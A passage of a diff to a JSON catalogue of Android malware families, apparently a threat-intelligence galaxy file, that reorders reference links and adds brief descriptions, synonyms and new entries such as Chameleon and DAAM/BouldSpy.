"https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", + "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", + "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ", + "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", + "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus", + "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", + "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html", + "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis", - "https://assets.virustotal.com/reports/2021trends.pdf" + "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html", + "https://community.riskiq.com/article/85b3db8c", + "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html", + "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/", + "https://securelist.com/mobile-malware-evolution-2019/96280/", + "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html", + "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html", + "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/", + "https://0x1c3n.tech/anubis-android-malware-analysis", + "https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/", + "https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb", + "https://pentest.blog/n-ways-to-unpack-mobile-malware/" ], "synonyms": [ "BankBot", @@ -298,8 +312,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy", - "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf", - "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/", + "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf" ], "synonyms": [], "type": [] @@ -348,7 +362,7 @@ "value": "ATANK" }, { - "description": "", + "description": "remote access tool (RAT) payload on Android devices", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.badcall", @@ -376,16 +390,16 @@ "value": "BadPatch" }, { - "description": "", + "description": "According to PCrisk, Bahamut is the name of Android malware with spyware functionality. Threat actors use Bahamut to steal sensitive information. The newest malware version targets various messaging apps and personally identifiable information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", - "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/", - "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/", + "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://blog.cyble.com/2022/06/29/bahamut-android-malware-returns-with-new-spying-capabilities/", - "https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/", "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/", + "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/", "https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw" ], "synonyms": [], @@ -400,8 +414,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke", "https://securelist.com/basbanke-trend-setting-brazilian-banking-trojan/90365/", - "https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE", - "https://twitter.com/LukasStefanko/status/1280243673100402690" + "https://twitter.com/LukasStefanko/status/1280243673100402690", + "https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE" ], "synonyms": [], "type": [] @@ -414,12 +428,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian", - "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html", "https://www.youtube.com/watch?v=DPFcvSy4OZk", "https://cryptax.medium.com/multidex-trick-to-unpack-android-bianlian-ed52eb791e56", + "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221", "https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html", "https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5", - "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221", + "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html", "https://cryptax.medium.com/android-bianlian-payload-61febabed00a", "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726" ], @@ -432,7 +446,7 @@ "value": "BianLian (Android)" }, { - "description": "", + "description": "According to PCrisk, BraDex is a banking malware targeting Android operating systems. This malicious program aims to gain access to victims' bank accounts and make fraudulent transactions.\r\n\r\nAt the time of writing, BrasDex targets Brazilian banking applications exclusively. In previous BrasDex campaigns, it infiltrated devices under the guise of Android system related apps. Lately, this malware has been installed by a fake Brazilian Banco Santander banking application.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.brasdex", @@ -445,16 +459,16 @@ "value": "BrasDex" }, { - "description": "", + "description": "According to Cleafy, the victim's Android device is factory reset after the attackers siphon money from the victim's bank account. This distracts users from the crime, while removing traces or footprints that might be of interest to forensic analysts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata", - "https://securelist.com/spying-android-rat-from-brazil-brata/92775/", "https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account", - "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam", + "https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again", + "https://securelist.com/spying-android-rat-from-brazil-brata/92775/", "https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html", - "https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat", - "https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again" + "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam", + "https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat" ], "synonyms": [ "AmexTroll" @@ -469,8 +483,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.brunhilda", - "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud", "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html", + "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud", "https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf" ], "synonyms": [], @@ -493,12 +507,13 @@ "value": "BusyGasper" }, { - "description": "", + "description": "According to PCrisk, CapraRAT is the name of an Android remote access trojan (RAT), possibly a modified version of another (open-source) RAT called AndroRAT. It is known that CapraRAT is used by an advanced persistent threat group (ATP) called APT36 (also known as Earth Karkaddan). CapraRAT allows attackers to perform certain actions on the infected Android device.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.capra_rat", "https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/", - "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html" + "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html", + "https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/" ], "synonyms": [], "type": [] @@ -524,8 +539,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites", - "https://www.youtube.com/watch?v=1LOy0ZyjEOk", - "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang" + "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", + "https://www.youtube.com/watch?v=1LOy0ZyjEOk" ], "synonyms": [], "type": [] @@ -534,30 +549,30 @@ "value": "Catelites" }, { - "description": "", + "description": "According to PCrisk, Cerberus is an Android banking Trojan which can be rented on hacker forums. It was been created in 2019 and is used to steal sensitive, confidential information. Cerberus can also be used to send commands to users' devices and perform dangerous actions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus", - "https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf", "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html", - "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", - "https://nur.pub/cerberus-analysis", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://securelist.com/the-state-of-stalkerware-in-2021/106193/", "https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus", - "https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/", - "https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/", - "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html", - "https://github.com/ics-iot-bootcamp/cerberus_research", "https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/", - "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/", "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/", + "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/", + "https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf", + "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html", "https://community.riskiq.com/article/85b3db8c", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf", + "https://github.com/ics-iot-bootcamp/cerberus_research", + "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html", + "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf", + "https://nur.pub/cerberus-analysis", "https://twitter.com/AndroidCerberus", - "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace" + "https://securelist.com/the-state-of-stalkerware-in-2021/106193/", + "https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/" ], "synonyms": [], "type": [] @@ -565,14 +580,27 @@ "uuid": "c3a2448f-bb41-4201-b524-3ddcb02ddbf4", "value": "Cerberus" }, + { + "description": "The malware chamaleon is an Android trojan that pretends to be legitimate entities to steal data from users in Australia and Poland. It exploits the Accessibility Service to monitor and modify the device screen.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chameleon", + "https://blog.cyble.com/2023/04/13/chameleon-a-new-android-malware-spotted-in-the-wild/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "90b3a256-311d-416b-b333-e02b910ba75d", + "value": "Chameleon" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois", - "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/", + "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html", "https://github.com/maddiestone/ConPresentations/blob/master/KasperskySAS2019.Chamois.pdf", - "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html" + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/" ], "synonyms": [], "type": [] @@ -585,10 +613,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", + "http://blog.checkpoint.com/2017/01/24/charger-malware/", "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html", - "https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-january-14-29-2017", - "http://blog.checkpoint.com/2017/01/24/charger-malware/" + "https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf" ], "synonyms": [], "type": [] @@ -615,69 +643,69 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", - "https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/", - "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html", - "https://citizenlab.ca/2020/12/the-great-ipwn-journalists-hacked-with-suspected-nso-group-imessage-zero-click-exploit/", - "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", - "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", - "https://thewire.in/tag/pegasus-project", - "https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/", - "https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html", - "https://nex.sx/blog/2021/08/03/the-pegasus-project.html", - "https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html", - "https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/", - "https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5", - "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/", - "https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus", - "https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/", - "https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages", - "https://twitter.com/alexanderjaeger/status/1417447732030189569", - "https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure", - "https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/", - "https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/", - "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/", - "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/", - "https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/", - "https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/", - "https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/", - "https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/", - "https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat", - "https://twitter.com/billmarczak/status/1416801439402262529", - "https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/", - "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/", - "https://media.ccc.de/v/33c3-7901-pegasus_internals", - "https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/", - "https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/", - "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/", - "https://objective-see.com/blog/blog_0x67.html", - "https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus", - "https://zetter.substack.com/p/pegasus-spyware-how-it-works-and", - "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1", - "https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/", - "https://irpimedia.irpi.eu/sorveglianze-cy4gate/", - "https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html", - "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/", - "https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying", - "https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/", - "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/", - "https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/", - "https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/", - "https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/", "https://thewire.in/media/pegasus-project-spyware-indian-journalists", - "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", - "https://forbiddenstories.org/about-the-pegasus-project/", - "https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests", + "https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/", + "https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus", + "https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/", + "https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto", + "https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5", + "https://objective-see.com/blog/blog_0x67.html", + "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1", "https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso", - "https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/", + "https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html", + "https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/", + "https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests", + "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/", + "https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/", + "https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/", + "https://zetter.substack.com/p/pegasus-spyware-how-it-works-and", + "https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html", "https://citizenlab.ca/2021/07/amnesty-peer-review/", - "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/", - "https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/", + "https://media.ccc.de/v/33c3-7901-pegasus_internals", + "https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/", + "https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/", + "https://nex.sx/blog/2021/08/03/the-pegasus-project.html", + "https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/", + "https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html", + "https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus", + "https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/", + "https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages", + "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", + "https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/", + "https://twitter.com/HackSysTeam/status/1418223814387765258?s=20", + "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/", + "https://irpimedia.irpi.eu/sorveglianze-cy4gate/", + "https://forbiddenstories.org/about-the-pegasus-project/", + "https://twitter.com/alexanderjaeger/status/1417447732030189569", + "https://twitter.com/billmarczak/status/1416801439402262529", "https://www.theguardian.com/news/series/pegasus-project", "https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/", + "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html", + "https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/", + "https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/", + "https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/", + "https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/", + "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/", + "https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure", + "https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/", + "https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/", + "https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/", + "https://citizenlab.ca/2020/12/the-great-ipwn-journalists-hacked-with-suspected-nso-group-imessage-zero-click-exploit/", + "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/", + "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/", + "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", + "https://thewire.in/tag/pegasus-project", "https://www.cybertrends.it/pegasus-lo-spyware-per-smartphone-come-funziona-e-come-ci-si-puo-proteggere/", - "https://twitter.com/HackSysTeam/status/1418223814387765258?s=20" + "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", + "https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/", + "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/", + "https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/", + "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/", + "https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat", + "https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/", + "https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/" ], "synonyms": [ "JigglyPuff", @@ -706,9 +734,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clipper", - "https://news.drweb.com/show?lng=en&i=12739", "https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/", - "https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html" + "https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html", + "https://news.drweb.com/show?lng=en&i=12739" ], "synonyms": [], "type": [] @@ -762,16 +790,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.coper", - "https://cert.pl/posts/2021/12/aktywacja-aplikacji-iko/", - "https://www.trendmicro.com/en_us/research/22/g/examining-new-dawdropper-banking-dropper-and-daas-on-the-dark-we.html", - "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/", - "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html", "https://cert-agid.gov.it/news/analisi-e-approfondimenti-tecnici-sul-malware-coper-utilizzato-per-attaccare-dispositivi-mobili/", - "https://twitter.com/_icebre4ker_/status/1541875982684094465", + "https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0", + "https://labs.k7computing.com/index.php/play-store-app-serves-coper-via-github/", "https://blog.cyble.com/2022/03/24/coper-banking-trojan/", "https://thehackernews.com/2022/04/new-octo-banking-trojan-spreading-via.html", - "https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0", - "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace" + "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/", + "https://www.trendmicro.com/en_us/research/22/g/examining-new-dawdropper-banking-dropper-and-daas-on-the-dark-we.html", + "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html", + "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace", + "https://twitter.com/_icebre4ker_/status/1541875982684094465", + "https://cert.pl/posts/2021/12/aktywacja-aplikacji-iko/" ], "synonyms": [ "ExobotCompact", @@ -787,8 +816,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.corona_worm", - "https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan", - "https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html" + "https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html", + "https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan" ], "synonyms": [], "type": [] @@ -810,7 +839,7 @@ "value": "Cpuminer (Android)" }, { - "description": "", + "description": "According to NHS Digital, CryCryptor is distributed via websites that spoof health organisations. At the time of publication these websites have affected the Canadian health service. CryCryptor cannot be obtained from the Google Play store, so devices restricted to only running apps from the store are not affected.\r\n\r\nWhen CryCryptor is run it encrypts common file types and saves a ransom note to every directory where files have been encrypted. Encrypted files have the extension '.enc' appended to the filenames. Additional files are saved containing the salt values used in each encryption and an initialisation vector. These files have the extensions '.enc.salt' and '.enc.iv' respectively.\r\n\r\nWhen files have been encrypted, a notification is displayed directing users to open the ransom note.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.crycryptor", @@ -841,13 +870,16 @@ "value": "CyberAzov" }, { - "description": "", + "description": "According to PCrisk, DAAM is an Android malware utilized to gain unauthorized access to targeted devices since 2021. With the DAAM Android botnet, threat actors can bind harmful code with a genuine application using its APK binding service.\r\n\r\nLookout refers to this malware as BouldSpy and assesses with medium confidence that this Android surveillance tool is used by the Law Enforcement Command of the Islamic Republic of Iran (FARAJA).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.daam", - "https://blog.cyble.com/2023/04/20/daam-android-botnet-being-distributed-through-trojanized-applications/" + "https://blog.cyble.com/2023/04/20/daam-android-botnet-being-distributed-through-trojanized-applications/", + "https://www.lookout.com/blog/iranian-spyware-bouldspy" + ], + "synonyms": [ + "BouldSpy" ], - "synonyms": [], "type": [] }, "uuid": "37a3b62e-99da-47d7-81fb-78f745427b16", @@ -886,8 +918,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.defensor_id", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/" + "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [ "Defensor Digital" @@ -915,9 +947,9 @@ "meta": { "refs": [ 